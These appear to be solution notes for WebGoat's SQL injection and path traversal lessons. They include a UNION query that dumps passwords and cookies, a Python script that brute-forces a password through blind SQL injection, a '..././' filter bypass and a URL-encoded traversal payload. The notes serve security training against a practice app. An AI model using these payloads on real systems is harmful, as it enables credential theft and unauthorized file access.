Injection

SQL Injection Intro

SQL Injection Advance

3/

You can see the table userdata has 7 colums and the table user_system_data olnly has 4 colums, so the correct query to use union is:

' union select userid, user_name, password, cookie, null, null, null from user_system_data;--

5/

import requests
import string

url = 'http://localhost:8080/WebGoat/SqlInjectionAdvanced/challenge'
password=''
cookie = {"JSESSIONID":"sQ7Ew5BK_IUP7cCxfeu1oOviaQsNxE99PzLtVzg0"}
for i in range(1,23,1):
    for c in string.printable:
        r = requests.put(url,cookies=cookie,data={'username_reg':f"tom' AND substr(password,{i},1)='{c}'--",'email_reg':'tom@gmail.com','password_reg':'1','confirm_password_reg':'1'})
        #print(r.text)
        if 'already exists' in r.text:
            print(c)
            password+=c
print(password)

SQL Injection Mitigation

Path traversal

2/ Path traversal while uploading files

Change full name to ../test and update profile:

3/ Path traversal while uploading files

../ is removed. But you can use ..././, and when ../ is removed, you will have ../

4/ Path traversal while uploading files

Not same as above challenges. Path won't be not update when you update your full name. But you can change filename.

5/ Retrieving other files with a path traversal

When you click "show random cat picture", a cat picture will be shown. Modify request, you can see the parameter id in response, this values is picture name.

use this parameter with value is something like ../, you will receive illegible character.

url encode this value : you will see secret file.

Final payload: %2e%2e%2f%2e%2e%2fpath-traversal-secret

Don't use .jpg because it will be added automatically.